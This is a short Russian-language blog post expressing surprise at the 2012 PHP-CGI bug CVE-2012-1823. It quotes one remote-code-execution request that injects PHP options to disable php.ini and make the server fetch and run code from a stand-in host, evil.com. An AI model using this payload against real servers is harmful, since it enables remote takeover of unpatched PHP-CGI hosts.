Не перестаю удивляться

Просто уму не постижимо, что в 2012 году все еще находят в PHP какие-то феерические баги.

Меня раньше несколько удивляло, что время от времени в php находились баги, которые позволяли запускать вредоносный код, расположенный на совершенно посторонних серверах. Но я тогда был ASP-куном, в чьем мирке это просто невозможно. А теперь это так близко, что я испытываю шок.

http://www.metasploitminute.com/2012/05/cve-2012-1823-php-cgi-bug.html

Просто скопипащу это сюда про CVE-2012-1823:

Remote Code execution: index.php/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://evil.com/code.txt%20-n

this negates php.ini settings and Suhosin extension (since the “-n” flag tells PHP not to use an php.ini file at all, hence the Suhosin extension is not loaded).

Популярное